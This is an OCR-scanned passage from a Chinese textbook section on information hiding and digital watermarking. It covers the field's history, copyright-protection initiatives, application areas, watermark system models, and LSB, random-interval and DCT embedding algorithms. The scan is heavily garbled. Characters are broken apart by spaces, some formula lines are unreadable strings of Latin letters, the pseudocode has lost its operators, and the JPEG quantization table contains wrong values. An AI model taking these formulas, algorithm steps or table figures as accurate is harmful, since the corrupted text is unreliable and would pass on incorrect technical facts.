一 些 信息 处 理 领域 的 国际 会 议 上 也 都 有 关于 信息 隐藏 技术 的 专题 。Proceeding of IEEE 于 
1999 年 7 月 出 版 了 关于 多 媒体 信息 隐藏 的 专辑 。 我 国 也 先后 于 1999 年 12 月 ，2000 年 6 
月 和 2001 年 9 月 举办 了 三 次 信息 隐藏 技术 研讨 会 ,国家 863 计划 智能 计算 机 专家 组 会 同 
中 科 院 自动 化 所 模式 识别 国家 重点 实验 室 和 北京 邮电 大 学 信息 安全 中 心 还 召开 了 专门 的 
“数字 水 印 学 术 研讨 会 ”。 

随 着 理论 研究 的 进行 ， 相 关 的 软件 也 不 断 推 出 ， 并 在 短 短 几 年 中 涌现 了 数 以 十 计 的 
从 事 水 印 技术 应 用 的 公司 。 日 本 电器 公司 、 日 立 制作 所 、 先 锋 、 索 尼 ， 和 美国 商用 机 器 
公司 等 正 联合 开发 统一 标准 的 基于 数字 水 印 技术 的 DVD 影碟 防盗 版 技术 。DVD 影碟 在 
理论 上 可 以 无 限制 复制 高 质量 的 画面 和 声音 ， 因 此 迫切 需要 有 效 的 防 DVD 盗版 技术 。 
新 的 防盗 版 技术 在 构成 动态 图 像 的 每 一 个 静态 画面 数据 中 ， 组 合 进 可 防止 数据 复制 的 数 
字 水 印 。 这 样 ， 消 费 者 可 在 自用 的 范围 内 复制 和 欣赏 高 质量 动态 图 像 节目 ， 但 以 赢利 为 
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目的 大 批量 非法 复制 则 无 法 进行 。 

德国 最 近 在 数字 水 印 保护 和 防止 伪造 电子 照片 的 技术 方面 取得 突破 。 以 制作 个 人 身 
份 证 为 例 ， 一 般 要 经 过 扫描 照片 和 签名 、 输 入 制 证 机 、 打 印 和 塑封 等 过 程 。 上 述 新 技术 
是 在 打印 证 件 前 ， 在 照片 上 附加 一 个 暗藏 的 数字 水 印 。 具 体 做 法 是 在 照片 上 对 某 些 不 为 
人 注意 的 部 分 进行 改动 。 处 理 后 的 照片 用 肉眼 看 与 原来 完全 一 样 ， 只 有 专用 的 扫描 器 才 
发 现 水 印 ， 从 而 可 以 迅速 无 误 地 确定 证 件 的 真 伪 。 该 系统 既 可 在 照片 上 加 上 牢固 的 水 
印 ， 也 可 以 经 改动 使 水 印 消失 ， 使 任何 伪造 企图 都 无 法 得 逮 。 

1998 年 ， 美 国 版 权 保护 技术 组 织 (CPTWG) 成 立 了 专门 的 数据 隐藏 小 组 (DHSG)， 
考虑 制定 版 权 保护 水 印 的 技术 标准 ， 并 提出 了 一 些 基 本 的 要 求 : 

。 隐藏 于 数字 作品 中 的 水 印 是 不 可 感知 的 。 

。 可 被 专用 数字 电路 识别 。 

。 水 印 的 检测 不 必 获 取 完 整 的 数据 。 

可 标记 “未 曾 复制 ”，“ 只 可 复制 一 次 ”和 “不 能 再 复制 ”等 信息 。 
漏 检 概率 低 。 

。 对 常用 信号 处 理 过 程 具有 重 棒 性 。 

。 使 用 成 熟 的 技术 嵌入 或 检测 水 印 。 

为 研究 网 络 时 代 音 乐 版 权 保护 技术 而 由 RIAA 及 大 唱片 公司 于 1999 年 2 月 成 立 了 业 
界 团 体 SDMI (Secure Digital Music Initiative)，SDMI 于 1999 年 9 月 在 作为 临时 版 权 保 
护 技术 的 “Phasel1” 中 采用 了 Verance 公司 的 数字 水 印 技术 以 保护 在 Intemet 上 发 布 的 数 
字音 频 文件 。Verance 公司 是 由 ARIS 和 Solana 两 家 公司 于 1999 年 6 月 合并 组 建 的 ， 它 
在 音频 水 印 技术 开发 及 应 用 方面 处 于 世界 领先 水 平 .SDMI 现 已 开始 制定 被 称 为 “Phase2” 
的 防止 非法 复制 的 技术 标准 。 在 Phase2 中 ,将 考虑 采用 两 种 水 印 ， 一 种 为 难以 消除 的 鲁 
棒 性 强 的 水 印 ; 另 一 种 为 利用 音频 数据 压缩 等 手段 容易 消除 的 “ 易 损 水 印 ”。 当 使 用 者 想 
通过 再 压缩 或 模拟 复制 等 方式 改变 部 分 原 有 数据 而 使 之 流通 时 ， 鲁 棒 性 强 的 数字 水 印 将 
留 下 ， 而 易 损 水 印 将 会 丢失 。 放 音 设备 一 旦 检测 出 这 种 状态 ， 便 可 拒绝 播放 。 

由 欧洲 委员 会 资助 的 几 个 国际 研究 项 目 也 正 致 力 于 实用 的 水 印 技术 研究 。 
TALISMAN 的 目标 是 为 欧盟 成 员 国 的 服务 提供 者 提供 一 个 标准 版 权 保护 机 制 , 以 保护 数 
字 化 产品 ,防止 大 规模 商业 盗版 和 非法 拷贝 。TALISMAN 的 预期 产品 是 通过 标记 和 水 印 
方法 得 到 一 个 视频 序列 保护 系统 。OCTALIS 的 主要 目标 是 建立 一 个 全 球 范围 的 解决 方 
法 ， 通 过 它 能 够 公平 地 进行 数据 存 取 控 制 和 进行 有 效 的 版 权 保 护 ， 并 能 在 大 规模 实验 系 
统 ( 如 Internet Fl EBU (欧洲 广播 联盟 ) 网 络 ) 上 证 明 其 有 效 性 。 欧 盟 期 望 能 使 其 成 员 
国 在 数字 作品 电子 交易 方面 达成 协议 。 其 中 的 数字 水 印 系统 可 以 提供 对 复制 品 的 探测 追 
踪 ， 在 数字 作品 转让 之 前 ， 作 品 创作 者 可 以 嵌入 创作 标志 水 印 ， 作品 转让 后 ， 媒 体 发 行 
者 对 存储 在 服务 器 中 的 作品 加 入 发 行者 标志 ; 在 出 售 作品 拷贝 时 ， 还 要 加 入 销售 标志 
图 5-14 所 示 。 
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销售 监控 与 
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图 5-14 欧盟 提出 的 一 个 数字 作品 电子 交易 框架 


经 过 多 年 的 努力 ， 信 息 隐 藏 技术 的 研究 已 经 取得 了 很 大 进展 ， 国 际 上 先进 的 信息 隐 
藏 技术 现 已 能 做 到 : 使 隐藏 有 其 他 信息 的 信息 不 但 能 经 受 人 的 感觉 检测 和 仪器 设备 的 检 
测 ， 而 且 还 能 抵抗 各 种 人 为 的 蓄意 攻击 。 但 总 的 来 说 ， 信 息 隐 藏 技术 尚未 发 展 到 完善 的 
可 实用 的 阶段 ， 仍 有 不 少 技术 性 的 问题 需要 解决 。 但 是 ， 水 印 验证 体系 的 建立 、 法 律 的 
保护 等 因素 也 是 信息 隐藏 技术 在 迈 向 实用 化 中 不 可 缺少 的 应 用 环境 。 另 外 ， 信 息 隐藏 技 
术 发 展 到 今天 ， 还 没有 找到 自己 的 理论 依据 ， 没 有 形成 理论 体系 ， 许 多 人 还 是 在 用 香农 
的 《信息 论 》 作 和 解释。 目前 ， 随 着 技术 的 不 断 提高 ， 对 理论 指导 的 期 待 已 in 
特别 是 在 一 些 关键 问题 难以 解决 的 时 候 ， 比 如 ， 如 何 计 算 一 个 数字 媒体 或 文件 所 能 
的 最 大 安全 信息 量 等 。 目 前 ， 使 用 密码 加 密 仍 是 网 络 上 主要 的 信息 安全 传输 手段 ， pe 
隐藏 技术 在 理论 研究 、 技 术 成 熟 度 和 实用 性 方面 都 无 法 与 之 相 比 ， 但 它 潜在 的 价值 是 无 
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法 估量 的 ， 特 别 是 在 迫切 需要 解决 的 版 权 保 护 等 方面 ， 可 以 说 是 根本 无 法 被 取代 的 ， 相 
信 其 必 将 在 未 来 的 信息 安全 体系 中 发 挥 重 要 作用 。 
5.3.1.5 ”信息 隐藏 技术 的 应 用 领域 

上 面 实际 上 已 经 涉及 到 了 信息 隐藏 技术 的 应 用 领域 ， 但 是 为 了 能 够 深刻 地 理解 开展 
信息 隐藏 技术 研究 的 意义 ， 下 面 将 目前 信息 隐藏 技术 在 信息 安全 的 各 个 领域 中 发 挥 的 作 
用 系统 的 总 结 为 五 个 方面 : 

@ 数据 保密 。 在 mtemet 上 传输 一 些 秘密 数据 要 防止 非 授权 用 户 截取 并 使 用 ， 这 是 
网 络 安全 的 一 个 重要 内 容 。 随 着 经 济 的 全 球 化 ， 这 一 点 不 仅 将 涉及 政治 、 军 事 ， 还 将 涉 
及 到 商业 、 金 融和 个 人 隐私 等 。 而 我 们 可 以 通过 使 用 信息 隐藏 技术 来 保护 必须 在 网 上 交 
流 的 信息 ， 如 : 电子 商务 中 的 敏感 数据 、 谈 判 双 方 的 秘密 协议 及 合同 、 网 上 银行 交易 中 
的 敏感 信息 、 重 要 文件 的 数字 签名 和 个 人 隐私 等 等 ， 这 样 就 可 以 不 引起 好 事 者 的 兴趣 ， 
从 而 保护 了 这 些 数据 。 另 外 ， 还 可 以 对 一 些 不 愿意 为 别人 所 知 的 内 容 使 用 信息 隐藏 的 方 
式 进行 隐蔽 存储 ， 使 得 只 有 掌握 识别 软件 的 人 才能 读 出 这 些 内 容 。 

© 数据 的 不 可 抵赖 性 。 在 网 上 交易 中 ， 交 易 双 方 的 任何 一 方 不 能 抵赖 自己 曾经 作 
出 的 行为 ， 也 不 能 否认 曾经 接收 到 对 方 的 信息 ， 这 是 交易 系统 中 的 一 个 重要 环节 。 这 可 
以 使 用 信息 隐藏 技术 中 的 水 印 技术 ， 在 交易 体系 中 的 任何 一 方 发 送 或 接收 信息 时 ， 将 各 
自 的 特征 标记 以 水 印 的 形式 加 入 到 传递 的 信息 中 ， 这 种 水 印 应 是 不 能 被 去 除 的 ， 以 此 达 
到 确认 其 行为 的 目的 。 

© 数字 作品 的 版 权 保 护 。 版 权 保 护 是 信息 隐藏 技术 中 的 水 印 技术 所 试图 解决 的 一 
个 重要 问题 。 随 着 数字 服务 会 越 来 越 多 ， 如 数字 图 书馆 、 数 字 图 书 出 版 、 数 字 电 视 、 数 
字 新 闻 等 等 ， 这 些 服务 提供 的 都 是 数字 作品 ， 数 字 作品 具有 易 修改 、 易 复制 的 特点 ， 在 
今天 已 经 成 为 迫切 需要 解决 的 实际 问题 。 不 解决 好 这 个 问题 ， 将 极 大 地 损害 服务 提供 商 
的 利益 ， 阻 碍 先进 技术 的 推广 和 发 展 。 数 字 水 印 技术 可 以 成 为 解决 此 难题 的 一 种 方案 : 
服务 提供 商 在 向 用 户 发 放 作品 的 同时 ， 将 双方 的 信息 代码 以 水 印 的 形式 隐藏 在 作品 中 ， 
这 种 水 印 从 理论 上 将 应 该 是 不 能 被 破坏 的 。 当 发 现 数字 作品 在 非法 传播 时 ， 可 以 通过 提 
取出 的 水 印 代码 追 查 非法 散播 者 。 

© 防伪 。 商 务 活动 中 的 各 种 票据 的 防伪 也 使 信息 隐藏 技 术 有 用 武之 地 。 在 数字 票 
据 中 隐藏 的 水 印 经 过 打印 后 仍然 存在 ， 可 以 通过 再 扫描 回 数字 形式 ， 提 取 防 伪 水 印 ， 以 
证 实 票 据 的 真实 性 。 

© 数据 的 完整 性 。 对 于 数据 完整 性 的 验证 是 要 确认 在 网 上 传输 或 存储 过 程 中 并 没 
有 被 窜改 。 通 过 使 用 脆弱 水 印 技术 保护 的 媒体 一 旦 被 窜改 就 会 破坏 水 印 ， 从 而 使 数据 的 
完整 性 很 容易 被 识别 。 


5.3.2 ”数字 水 印 技术 


5.3.2.1 ”数字 水 印 概论 
随 着 数字 技术 的 发 展 ，Intemet 应 用 日 益 广泛 , 利用 数字 媒体 因 其 数字 特征 极 易 被 复 
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制 、 自 改 、 非 法 传播 以 及 蓄意 攻击 ， 其 版 权 保护 ， 已 日 益 引起 人 们 的 关注 。 近 年 来 国际 
上 提出 了 一 种 新 型 的 版 权 保护 技术 一 数字 水 印 (Digital Watermark) 技术 。 利 用 人 类 的 听 
觉 、 视 觉 系统 的 特点 ， 在 图 像 、 音 频 、 视 频 中 加 入 一 定 的 信息 ， 使 人 们 很 难 分 辨 出 加 水 
印 后 的 资料 与 原始 资料 的 区 别 ， 而 通过 专门 的 检验 步骤 又 能 提取 出 所 加 信息 ， 以 此 证 明 
原创 者 对 数字 媒体 的 版 权 。 
数字 水 印 技术 通过 将 数字 、 序 列 号 、 文 字 、 图 像 标志 等 信息 嵌入 到 媒体 中 ， 和 嵌入 的 
过 程 中 对 载体 尽量 小 的 修改 ， 以 达到 最 强 的 鲁 棒 性 ， 当 嵌入 水 印 后 的 媒体 受到 攻击 仍然 
可 以 恢复 水 印 或 者 检测 出 水 印 的 存在 。 数 字 水 印 技术 出 现 的 比较 晚 ，Van Schyndel 在 
ICIP94 会 议 上 发 表 了 题 为 “A digital watermarking” 的 论文 标志 这 一 领域 的 开始 ， 而 隐 
写 术 已 经 有 很 深 的 理论 基础 ， 因 此 研究 数字 水 印 的 过 程 中 借鉴 了 很 多 隐 写 术 方面 取得 的 
成 果 ， 下 面 比较 全 面 地 介绍 数字 水 印 技术 。 

数字 水 印 技 术 ， 是 指 在 数字 化 的 数据 内 容 中 嵌入 不 明显 的 记号 。 被 和 能 入 的 记号 通常 
是 不 可 见 或 不 可 察觉 的 , 但 是 通过 一 些 计 算 操 作 可 以 被 检测 或 被 提取 。 水 印 与 源 数 据 (如 
图 像 、 音 频 、 视 频数 据 ) 紧密 结合 并 隐藏 其 中 ， 成 为 不 可 分 离 的 一 部 分 。 

隐形 数字 水 印 主要 应 用 领域 包括 : 原始 数据 的 真 伪 鉴 别 、 数 据 侦 测 与 跟踪 、 数 字 产 
品 版 权 保护 。 数 字 水印 不 仅 要 实现 有 效 的 版 权 保 护 ， 而 且 加 入 水 印 后 的 图 像 必须 与 原始 
图 像 具 有 同样 的 应 用 价值 。 因 此 ， 数 字 图 像 的 内 嵌 水 印 有 下 列 特 点 : 

。 透明 性 : 水 印 后 图 像 不 能 有 视觉 质量 的 下 降 ， 与 原始 图 像 对 比 ， 很 难 发 现 二 者 的 
差别 ; 

。 鲁 棒 性 : 加 入 图 像 中 的 水 印 必 须 能 够 承受 施加 于 图 像 的 变换 操作 〈 如 : 加 入 噪声 、 
滤波 、 有 损 压缩 、 重 采样 、D/A BK A/D 转换 等 )， 不 会 因 变 换 处 理 而 丢失 ， 水 印 
信息 经 检验 提取 后 应 清晰 可 辨 ; 

。 安全 性 : 数字 水 印 应 能 抵抗 各 种 鞋 意 的 攻击 ， 必 须 能 够 唯一 地 标志 原始 图 像 的 相 
关 信息 ， 任 何 第 三 方 都 不 能 伪造 他 人 的 水 印 图 像 。 

5.3.2.2 ”基本 原理 、 分 类 及 模型 
所 有 骨 入 水 印 的 方法 都 包含 两 个 基本 的 构造 模块 : 水 印 嵌 入 系统 和 水 印 恢复 系统 。 
(1) 水 印 嵌入 系统 的 输入 是 水 印 ， 载 体 数 据 和 一 个 可 选 的 公 钥 或 私 铀 ， 见 图 5-15。 
水 印 可 以 是 任何 形式 的 数据 ， 比 如 数值 、 文 本 、 图 像 等 等 。 秘 钥 可 用 来 加 强 安全 性 ， 以 
避免 未 授权 方 恢 复 和 修改 水 印 。 当 水 印 与 私 钥 或 公 钥 结合 时 ， 和 嵌入 水 印 的 技术 通常 分 别 
称 为 秘密 水 印 技 术 和 公开 水 印 技 术 。 水 印 系统 的 输出 称 为 添加 了 水 印 的 数据 。 
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图 5-15 数字 水 印 嵌入 方案 
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〈2) 水 印 恢复 系统 的 输入 是 已 经 嵌入 水 印 的 数据 , 私 钥 或 公 钥 , 以 及 原始 数据 和 (或 ) 
原始 水 印 〈 取 决 于 添加 水 印 的 方法 )， 输 出 的 是 水 印 W， 或 者 是 某 种 可 信 度 的 值 ， 它 表 


明了 所 考察 数据 中 存在 给 定 水 印 的 可 能 性 ， 见 图 5-16。 
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图 5-16 数字 水 印 恢复 方案 
水 印 系统 根据 输入 输出 的 种 类 及 其 组 合 可 分 为 三 种 : 


(1) 秘密 水 印 〈 非 盲 化 水 印 ) 该 类 系统 至 少 需 要 原始 的 数据 。I 型 系统 从 可 能 失真 
的 输出 数据 中 提取 水 印 W， 并 使 用 原始 数据 作为 线索 来 确定 水 印 在 输出 数据 中 的 位 置 。 
TL 型 系统 也 需要 所 嵌入 水 印 的 一 个 拷贝 ， 得 到 输出 数据 中 是 否 含有 水 印 W 这 个 问题 的 
“是 ”或 “不 是 ”的 答案 。 由 于 该 系统 传输 的 信息 很 少 ， 并 且 需 要 使 用 密 钥 之 类 的 信息 ， 
因此 它 的 健壮 性 比 其 他 方案 更 好 。 
(2) 半 秘 密 水 印 〈 半 盲 化 水 印 ) 该 类 系统 并 不 使 用 原始 数据 来 检测 ， 但 是 需要 水 印 


的 拷贝 。 


G) 公开 水 印 〈 盲 化 或 健忘 水 印 ) 该 类 系统 是 目前 最 具 挑战 性 的 问题 ， 因 为 它 既 不 
需要 原始 的 秘密 信息 ， 也 不 需要 水 印 。 实 际 上 ， 这 种 系统 是 从 已 嵌入 水 印 的 数据 中 提取 


信息 (水 印 )。 


从 另 一 角度 分 类 ， 数 字 水 印 基本 可 分 为 如 下 几 类 : 


@ 按 水 印 的 载体 分 类 : 可 分 为 文本 水 印 、 图 像 水 印 、 音 频 水 印 和 视频 水 印 。 
© 按 水 印 的 用 途 分 类 : 可 分 为 版 权 保护 可 见 水 印 、 隐 藏 标识 水 印 等 。 


© 按 健壮 性 分 类 : 可 分 为 鲁 棒 水 印 和 易 损 水 印 。 


D PARABLE: 可 分 为 空域 /时 域 水 印 和 变换 域 水 印 。 
© 按 检 测 分 类 : 可 分 为 盲 水 印 和 非 盲 水 印 。 
通常 所 见 到 的 各 种 形式 的 数字 水 印信 号 ， 可 以 定义 为 如 下 信号 W [90]. 


W = {w(k))w(k) eB.k 4} 


XE P 表示 维 数 为 d 的 水 印信 号 域 ，q=1，2，3 分 别 表 示 声 音 、 静 止 图 像 和 视频 
图 像 。 水 印信 号 可 以 是 二 值 形式 B={0,1}, 或 B=-{-1.1}， 或 者 是 高 斯 噪声 形式 。 

数字 水 印 处 理 系 统 基 本 模型 可 以 定义 为 六 元 组 CXS, WS, KS, G, E, D). 

。 X65 代表 所 要 保护 的 数字 产品 XP 的 集合 
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WS 代表 所 有 可 能 水 印信 号 WISE 
KS 是 水 印 密 钥 天 的 集合 
G 表 示 利 用 密 钥 玉 和 待 丹 入 水 印 的 数字 产品 XP 共同 生成 水 印 的 算法 : 
e G: XSxKS >WS, W=G(XP, K) 
© ERA AKE W RARE th XP PHRASE, BI 
e E: XSxWS— XS, XP, = E(XP,.W) 
其 中 ，XP。 代 表 原 始 的 数字 产品 ， 瑟 代表 嵌入 水 印 后 得 到 的 数字 产品 。 
。 DRAKE FE, BI 
d: XSx KS — {0,1} 
1, WRXPHAETEW (H) 
0, WAXPH ASTETEW (Hy) 
这 里 ，Hi 和 Ho 代表 二 值 假 设 ， 分 别 表 示 水 印 的 有 无 。 
5.3.23 ”常用 实现 方法 与 算法 实例 

1. 常用 实现 方法 

目前 提出 的 数字 水 印 嵌入 方法 ， 基 本 分 为 两 类 : 基于 空间 域 和 基于 变换 域 的 方法 。 

(1) 空间 域 数 字 水 印 是 直接 在 声音 、 图 像 或 视频 等 信号 空间 上 有 合 加 水 印信 息 。 常 用 
的 技术 有 最 低 有 效 位 算法 (LSB) 和 扩展 频谱 方法 。 

LSB 算法 是 最 早 提出 的 一 种 典型 的 空间 域 信息 隐藏 算法 。 它 使 用 特定 的 密 钥 通过 伪 
随机 序列 发 生 器 产生 随机 信号 ， 然 后 按 一 定 的 规则 排列 成 2 维 水 印信 号 ， 并 逐一 插 到 原 
始 图 像 相 应 像素 值 的 最 低 几 位 。 由 于 水 印信 号 隐藏 在 最 低位 ， 相 当 于 和 登 加 了 一 个 能 量 微 
弱 的 信号 ， 因 此 在 视觉 和 听觉 上 很 难 察觉 。 该 算法 虽然 可 以 隐藏 较 多 的 信息 ， 但 隐藏 的 
信息 可 以 被 轻易 移 去 ， 很 容易 受到 有 损 压 缩 、 量 化 、 有 噪 信道 传输 的 影响 而 丢失 无 法 满 
足 数字 水 印 的 鲁 棒 性 要 求 。 不 过 ， 作 为 大 数据 量 的 信息 隐藏 方法 ，LSB 在 隐藏 通信 中 仍 
占据 相当 重要 的 地 位 。 

直接 序列 扩 频 水 印 算法 是 扩 频 通信 技术 在 数字 水 印 中 的 应 用 。 扩 频 通 信 将 待 传递 的 
信息 通过 扩 频 码 调制 后 散布 于 非常 宽 的 频带 中 ， 使 其 具有 伪 随 机 特性 。 收 信 方 通过 相应 
的 扩 频 码 进行 解 扩 ， 获 得 真正 的 传输 信息 。 扩 频 通信 具有 抗 干扰 性 强 、 高 度 保密 的 特性 。 
扩 频 水 印 方法 与 扩 频 通信 类 似 ， 是 将 水 印信 息 经 扩 频 调制 后 全 加 在 原始 数据 上 。 从 频 域 
上 看 ， 水 印信 息 散布 于 整个 频谱 ， 无 法 通过 一 般 的 滤波 手段 恢复 。 

(2) 变换 域 数字 水 印 是 指 在 DCT 变换 域 、 时 / 频 变 换 域 (DFT) 或 小 波 变 换 域 (DWT) 
上 隐藏 水 印 。 在 图 像 从 时 域 到 频 域 的 变换 过 程 中 ， 对 水 印信 息 进 行 一 定 的 频 域 调 制 ， 使 
其 很 好 地 隐藏 在 图 像 重 要 的 能 量 部 分 ， 同 时 又 不 引起 图 像 质量 的 明显 下 降 。 由 于 它 较 好 
地 满足 了 数字 水 印 技术 透明 性 和 和 鲁 棒 性 的 要 求 而 成 为 当前 最 重要 的 水 印 算法 。 其 中 ， 


D(XP, x)-| 


sf 


| ba 
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DCT 变换 域 数字 水 印 算法 是 在 图 像 的 DCT 变换 域 上 选择 中 低频 系数 释 加 水 印信 息 ， 因 
为 人 眼 的 感觉 主要 集中 在 这 一 频段 。 由 于 JPEG、MPEG 等 压缩 算法 的 核心 是 在 DCT 变 
换 域 上 进行 数据 量化 ， 所 以 通过 巧妙 的 融合 水 印 过 程 和 量化 过 程 ， 就 可 以 使 水 印 抵御 有 

在 数字 水 印 技术 中 ， 水 印 的 数据 量 和 和 鲁 棒 性 构成 了 一 对 基本 矛盾 。 从 主观 上 讲 ， 理 
想 的 水 印 算法 应 该 既 能 隐藏 大 量 数据 ， 又 可 以 抗 各 种 信道 噪声 和 信号 变形 。 然 而 在 实际 
中 ， 这 两 个 指标 往往 不 能 同时 实现 ， 不 过 这 并 不 会 影响 数字 水 印 技术 的 应 用 ， 因 为 实际 
应 用 一 般 只 偏重 其 中 的 一 个 方面 。 如 果 是 为 了 隐蔽 通信 ， 数 据 量 显然 是 最 重要 的 ， 由 于 
通信 方式 极为 隐蔽 ， 遭 遇 政 方 自 改 攻击 的 可 能 性 很 小 ， 因 而 对 鲁 棒 性 要 求 不 高 。 但 对 保 
证 数据 安全 来 说 ， 情 况 恰恰 相反 ， 各 种 保密 的 数据 随时 面临 着 被 瓷 取 和 算 改 的 危险 ， 所 
以 鲁 棒 性 是 十 分 重要 的 ， 此 时 ， 隐 藏 数据 量 的 要 求 居于 次 要 地 位 。 

近年 来 ， 多 媒体 技术 与 Internet 技术 发 展 迅速 ， 多 媒体 制作 领域 逐渐 繁荣 ， 各 种 形 
式 的 多 媒体 作品 包括 音频 、 视 频 、 动 画 、 图 像 等 纷纷 以 网 络 形式 发 布 。 国 际 互联 网 逐渐 
普及 的 副作用 也 十 分 明显 : 任何 人 都 可 以 通过 互联 网 轻易 取得 他 人 的 原创 作品 ， 尤 其 是 
数字 化 的 图 像 、 音 乐 、 电 影 等 等 ， 甚 至 不 经 作者 同意 而 任意 复制 、 修 改 、 从 而 伤害 了 创 
作者 的 权益 。 因 此 多 媒体 的 版 权 保 护 问题 成 了 一 项 紧迫 的 研究 课题 ， 数 字 水 印 技术 为 实 
现 有 效 的 信息 版 权 保 护 手段 提供 了 一 条 绒 新 的 思路 ， 成 为 多 媒体 信息 安全 研究 领域 的 一 
个 热点 问题 ， 逐 渐 得 到 重视 。 从 保密 的 角度 来 讲 ， 由 于 非法 拦截 者 从 网 上 拦截 下 来 的 是 
伪装 后 的 普通 文件 ， 看 起 来 和 其 他 的 一 般 资料 没有 差别 ， 因 而 十 分 容易 逃 过 非法 拦截 者 
的 破解 。 

2. 算法 实例 

A) LSB 算法 : 最 低 比 特 位 (LSB) 替换 是 最 简单 的 水 印 算法 。 虽 然 其 鲁 棒 性 在 实 
际 应 用 中 基本 上 失效 ， 但 是 了 解 这 种 算法 的 思想 ， 对 于 水 印 技术 初学 者 来 讲 也 具有 一 定 
的 指导 意义 。LSB 算法 的 嵌入 过 程 包括 选择 一 个 载体 元 素 的 子 集 Jijin } ， 然 后 在 
子 集 上 执行 替换 操作 cem BHE c; 的 LSB 与 m; 进行 交换 Cm, 可 以 是 1 或 0)。 一 
个 替换 系统 也 可 以 修改 载体 的 多 个 比特 ， 例 如 ， 在 一 个 载体 元 素 的 两 个 最 低 比 特 位 隐藏 
两 比特 信息 。 在 提取 过 程 中 , 抽出 被 选择 载体 元 素 的 LSB， 然 后 排列 起 来 重 构 秘 密 信息 。 
基本 方法 在 算法 5.1 和 5.2 中 描述 。 在 这 里 有 一 个 问题 需要 解决 ， 即 采用 什么 方法 选 
FF cj, 6 

算法 5.1 最 低 比 特 位 替换 的 嵌入 过 程 

fori=l,....1(©) do 


Sec; 


end for 
for i =1,...,1 (m) do 
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计算 存放 第 i 个 消息 位 的 指针 j; 


Sj —c;, Om, 


end for 

算法 5.2 最 低 比特 位 的 提取 过 程 
for i =1,....1(m) do 

计算 存放 第 i 个 消息 位 的 指针 j; 
m,LSB(c ;, ) 

end for 


为 了 能 解 出 秘密 信息 ， 接 收 者 必须 能 获得 嵌入 过 程 中 使 用 的 索引 序列 。 在 最 简单 的 
情况 下 ， 发 送 者 从 第 一 个 元 素 开 始 ， 使 用 所 有 的 伪装 载体 元 素 进行 信息 传送 。 通 常 由 于 
秘密 信息 比特 数 比 Xe) 小 ， 嵌 入 处 理 在 载体 末尾 很 长 一 段 之 前 就 结束 了 。 这 种 情况 下 ， 
剩 下 的 载体 元 素 保 持 不 变 。 但 是 这 导致 了 严重 的 安全 问题 , 载体 的 第 一 部 分 与 第 二 部 分 ， 
也 就 是 修改 的 部 分 和 没有 修改 的 部 分 ， 具 有 不 同 的 统计 特性 。 为 了 解决 这 个 问题 ， 比 如 
共享 程序 PGMStealth 中 使 用 了 随机 序列 来 延长 秘密 信息 ， 使 得 Ie) 二 1M)， 因 而 对 载体 
的 开始 和 结尾 产生 了 一 致 的 随机 修改 。 结 果 是 ， 典 入 过 程 更 改 了 比 传送 秘密 信息 所 需要 
的 更 多 的 元 素 ， 从 而 增 大 了 攻击 者 对 秘密 通信 的 怀疑 的 可 能 性 。 

较 复杂 的 方法 是 ， 使 用 伪 随 机 数 发 生 器 以 相当 随机 的 方式 来 扩展 秘密 信息 ， 一 个 流 
行 的 方法 是 随机 间隔 法 。 如 果 通 信 双 方 使 用 同一 个 伪装 密 钥 k 作 随 机 数 发 生 器 的 种 子 ， 
那么 它们 能 生成 一 个 随机 序列 k1,…,kim)， 并 且 把 它们 和 索引 一 起 按 下 列 方式 生成 隐藏 
信息 位 置 来 进行 信息 传送 : 

ji=ki 

j;=Jia tk; 这 2 (5.1) 

从 而 ， 可 以 伪 随 机 地 决定 两 个 嵌入 位 的 距离 。 由 于 接收 者 能 获得 种 子 k 和 随机 数 发 
生 器 的 信息 ， 因 此 他 能 重 构 k;， 进 一 步 获 得 整个 元 素 的 索引 序列 j;。 这 种 技术 在 流 载体 
中 尤其 有 效 。 见 算法 5.3 和 5.4 所 示 ， 它 们 是 算法 5.1 和 5.2 的 特殊 情况 。 

算法 $.3 ”随机 间隔 方法 的 戏 入 过 程 

for i =1,++,1 (c) do 

S;<C; 

end for 

使 用 种 子 k 随机 生成 序列 k; 

nek; 

for i=1,**+,1 (m) do 

s,<—c, Om, 


nen +k, 
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end for 

算法 $.4 ”随机 间隔 方法 的 提取 过 程 
使 用 种 子 k 随 机 生成 序列 k; 

nek; 

for i=1,-++,1 (m) do 

m,<LSB(c,,) 

nen +k, 


end for 

(2) DCT 水 印 算法 : DCT 水 印 算法 是 最 主要 的 变换 域 算 法 之 一 ， 其 细 分 种 类 很 多 。 
为 便于 理解 ， 我 们 从 一 种 简单 的 基于 DCT 系数 大 小 关系 的 实例 出 发 ， 来 介绍 DCT 水 印 
思想 ， 为 理解 图 像 乃 至 视频 水 印 技术 打下 一 定 基 础 。 首 先 很 有 必要 介绍 一 下 在 JPEG 图 
像 压缩 中 用 到 的 二 维 DCT 变换 ( 见 图 5-17)。 


JPEG 压缩 接口 


图 5-17 JPEG 图 像 压 缩 算 法 的 流程 图 


二 维 DCT 变换 是 目前 使 用 的 最 著名 的 有 损 数字 图 像 压缩 系统 ，JPEG 系统 的 核心 。 
JPEG 系统 首先 将 要 压缩 的 图 像 转换 为 YCbCr 颜色 空间 ， 并 把 每 一 个 颜色 平面 分 成 8x8 
的 像素 块 。 然 后 ， 对 所 有 的 块 进行 DCT 变换 。 在 量化 阶段 ， 对 所 有 的 DCT 系数 除 以 一 
些 预 定义 的 量化 值 〈 参 见 表 5-1)， 并 取 整 到 最 接近 的 整数 (根据 质量 因子 ， 量 化 值 能 通 
过 一 个 常数 进行 缩放 )。 这 个 处 理 的 目的 是 调整 图 像 中 不 同 频谱 成 分 的 影响 , 尤其 是 减 小 
了 最 高 频 的 DCT 系数， 它们 主要 是 噪声 并 且 不 含有 图 像 的 细节 。 最 终 获 得 的 DCT 系数 
通过 焙 编码 器 进行 压缩 〈 例 如 ， 哈 夫 曼 编码 或 算术 编码 )。 在 JPEG 译 码 时 ， 逆 量化 所 有 
的 DCT 系数 (也 就 是 乘 以 在 编码 阶段 中 使 用 的 量化 值 )， 然 后 执行 逆 DCT 变换 重 构 数 
据 。 恢 复 后 的 图 像 很 接近 (但 不 等 同 ) 于 原始 图 像 。 但 是 如 果 适 当地 设置 量化 值 ， 得 到 
的 图 像 光 凭 人 眼 是 觉察 不 到 差异 的 。 
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表 5-1 在 JPEG 压缩 方案 中 使 用 的 量化 值 〈 亮 度 成 分 ) 


(u,v) 0 1 2 3 4 5 6 7 
0 16 11 10 16 24 40 31 6l 
i 12 12 14 19 26 58 60 5 
2 14 13 16 24 40 57 69 56 
3 14 17 22 29 3 87 80 62 
4 18 22 37 56 68 109 103 77 
5 24 35 55 64 81 104 113 92 
